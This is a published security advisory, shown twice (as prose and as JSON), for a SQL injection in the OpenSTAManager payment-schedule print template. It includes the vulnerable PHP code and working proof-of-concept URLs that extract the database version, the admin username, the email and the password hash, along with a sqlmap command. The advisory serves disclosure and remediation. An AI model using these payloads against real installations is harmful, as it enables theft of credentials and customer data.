GHSA-Q6G3-FV43-M2W6

Vulnerability from github – Published: 2026-02-06 18:06 – Updated: 2026-02-06 18:06
VLAI?
Summary
OpenSTAManager has a SQL Injection in Scadenzario Print Template
Details

Summary

An authenticated SQL Injection vulnerability in OpenSTAManager's Scadenzario (Payment Schedule) print template allows any authenticated user to extract sensitive data from the database, including admin credentials, customer information, and financial records. The vulnerability enables complete database read access through error-based SQL injection techniques.

Details

The vulnerability exists in templates/scadenzario/init.php at line 46, where the id_anagrafica parameter is directly concatenated into an SQL query without proper sanitization:

Vulnerable Code:

if (get('id_anagrafica') && get('id_anagrafica') != 'null') {
    $module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query);
    $id_anagrafica = get('id_anagrafica');
}

The get() function retrieves user input from GET/POST parameters without validation. The parameter value is directly embedded into the SQL query string using string concatenation instead of using the application's prepare() sanitization function, enabling SQL Injection attacks.

Root Cause: - Missing use of prepare() function for input sanitization - Direct string concatenation in SQL query construction - No input validation or type checking

Affected Endpoint:

/pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD]

Affected Files: - templates/scadenzario/init.php (line 46) - Primary vulnerability - templates/scadenzario/init.php (lines 34, 40) - Similar pattern with date parameters - pdfgen.php - Entry point for template rendering

PoC (Proof of Concept)

Prerequisites

  • Valid authenticated session (any user role)

Exploitation Steps

1. Confirm Vulnerability - Basic Syntax Error Test:

 http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20

SQL syntax error displayed in application response

image

2. Extract Database Version - Error-Based SQLi:

http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221

Result: ~8.3.0~ (MySQL version)

image

3. Extract Database Name:

http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221

Result: ~openstamanager~

image

4. Extract Admin Username:

http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Result: ~admin~ image

5. Extract Admin Email:

http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Result: Admin email address

image

6. Extract Password Hash (Partial - XPATH 31 char limit):

http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Result: bcrypt password hash

image

7. Automated Exploitation with SQLMap:

Create request file sqli_osm.req:

GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=[SESSION_COOKIE]
User-Agent: Mozilla/5.0

Run SQLMap:

sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs

SQLMap Confirmed Injection Types: - ✅ Boolean-based blind SQL injection - ✅ Error-based SQL injection (MySQL >= 5.6 GTID_SUBSET) - ✅ Time-based blind SQL injection (SLEEP)

image

Impact

Who is Impacted: - ✅ All authenticated users - Any user with valid credentials can exploit this vulnerability - ✅ Low-privilege users - Even users with minimal permissions can access admin-level data - ✅ All OpenSTAManager installations - Vulnerability exists in the latest master branch

Attribution

Reported by Łukasz Rybak

Severity ?
8.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "devcode-it/openstamanager"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.9.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-69216"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-06T18:06:13Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nAn **authenticated SQL Injection vulnerability** in OpenSTAManager\u0027s Scadenzario (Payment Schedule) print template allows any authenticated user to extract sensitive data from the database, including admin credentials, customer information, and financial records. The vulnerability enables complete database read access through error-based SQL injection techniques.\n\n### Details\n\nThe vulnerability exists in `templates/scadenzario/init.php` at **line 46**, where the `id_anagrafica` parameter is directly concatenated into an SQL query without proper sanitization:\n\n**Vulnerable Code:**\n```php\nif (get(\u0027id_anagrafica\u0027) \u0026\u0026 get(\u0027id_anagrafica\u0027) != \u0027null\u0027) {\n    $module_query = str_replace(\u00271=1\u0027, \u00271=1 AND `co_scadenziario`.`idanagrafica`=\"\u0027.get(\u0027id_anagrafica\u0027).\u0027\"\u0027, $module_query);\n    $id_anagrafica = get(\u0027id_anagrafica\u0027);\n}\n```\n\nThe `get()` function retrieves user input from GET/POST parameters without validation. The parameter value is directly embedded into the SQL query string using string concatenation instead of using the application\u0027s `prepare()` sanitization function, enabling SQL Injection attacks.\n\n**Root Cause:**\n- Missing use of `prepare()` function for input sanitization\n- Direct string concatenation in SQL query construction\n- No input validation or type checking\n\n**Affected Endpoint:**\n```\n/pdfgen.php?ptype=scadenzario\u0026id_anagrafica=[INJECTION_PAYLOAD]\n```\n\n**Affected Files:**\n- `templates/scadenzario/init.php` (line 46) - **Primary vulnerability**\n- `templates/scadenzario/init.php` (lines 34, 40) - Similar pattern with date parameters\n- `pdfgen.php` - Entry point for template rendering\n\n\n---\n\n### PoC (Proof of Concept)\n\n#### Prerequisites\n- Valid authenticated session (any user role)\n\n#### Exploitation Steps\n\n**1. Confirm Vulnerability - Basic Syntax Error Test:**\n```bash\n http://localhost:8081/pdfgen.php?ptype=scadenzario\u0026id_anagrafica=1%22%20--%20\n```\n\nSQL syntax error displayed in application response\n\n\u003cimg width=\"2195\" height=\"392\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f62ca7b4-2397-4f90-8698-6cf7f867d102\" /\u003e\n\n---\n\n**2. Extract Database Version - Error-Based SQLi:**\n```bash\nhttp://localhost:8081/pdfgen.php?ptype=scadenzario\u0026id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221\n```\n\n**Result:** `~8.3.0~` (MySQL version)\n\n\u003cimg width=\"2061\" height=\"378\" alt=\"image\" src=\"https://github.com/user-attachments/assets/8ea16c47-36cc-4c25-a624-b42ccfcdf52f\" /\u003e\n\n---\n\n**3. Extract Database Name:**\n```bash\nhttp://localhost:8081/pdfgen.php?ptype=scadenzario\u0026id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221\n```\n\n**Result:** `~openstamanager~`\n\n\u003cimg width=\"1954\" height=\"345\" alt=\"image\" src=\"https://github.com/user-attachments/assets/47479297-5271-4c03-b242-efa513eb28f8\" /\u003e\n\n---\n\n**4. Extract Admin Username:**\n```bash\nhttp://localhost:8081/pdfgen.php?ptype=scadenzario\u0026id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221\n```\n\n**Result:** `~admin~`\n\u003cimg width=\"1998\" height=\"332\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9f8363cb-8da9-4e8f-8744-ef38c9706be8\" /\u003e\n\n---\n\n**5. Extract Admin Email:**\n```bash\nhttp://localhost:8081/pdfgen.php?ptype=scadenzario\u0026id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221\n```\n\n**Result:** Admin email address\n\n\u003cimg width=\"2006\" height=\"339\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4dcd5ea4-4eea-4730-8d39-b8ce2da46e84\" /\u003e\n\n---\n\n**6. Extract Password Hash (Partial - XPATH 31 char limit):**\n```bash\nhttp://localhost:8081/pdfgen.php?ptype=scadenzario\u0026id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221\n```\n\n**Result:** bcrypt password hash\n\n\u003cimg width=\"1924\" height=\"328\" alt=\"image\" src=\"https://github.com/user-attachments/assets/27b711f3-9bb6-4909-a5bd-a04177c9f219\" /\u003e\n\n---\n\n**7. Automated Exploitation with SQLMap:**\n\nCreate request file `sqli_osm.req`:\n```http\nGET /pdfgen.php?ptype=scadenzario\u0026id_anagrafica=1* HTTP/1.1\nHost: localhost:8081\nCookie: PHPSESSID=[SESSION_COOKIE]\nUser-Agent: Mozilla/5.0\n```\n\nRun SQLMap:\n```bash\nsqlmap -r sqli_osm.req --level 3 --risk 3 --dbs\n```\n\n**SQLMap Confirmed Injection Types:**\n- \u2705 Boolean-based blind SQL injection\n- \u2705 Error-based SQL injection (MySQL \u003e= 5.6 GTID_SUBSET)\n- \u2705 Time-based blind SQL injection (SLEEP)\n\n\u003cimg width=\"1498\" height=\"516\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b733f025-ac4b-4b36-a20e-76d826005f62\" /\u003e\n\n---\n\n### Impact\n\n**Who is Impacted:**\n- \u2705 **All authenticated users** - Any user with valid credentials can exploit this vulnerability\n- \u2705 **Low-privilege users** - Even users with minimal permissions can access admin-level data\n- \u2705 **All OpenSTAManager installations** - Vulnerability exists in the latest master branch\n---\n\n### Attribution\nReported by \u0141ukasz Rybak",
  "id": "GHSA-q6g3-fv43-m2w6",
  "modified": "2026-02-06T18:06:13Z",
  "published": "2026-02-06T18:06:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/devcode-it/openstamanager"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenSTAManager has a SQL Injection in Scadenzario Print Template"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.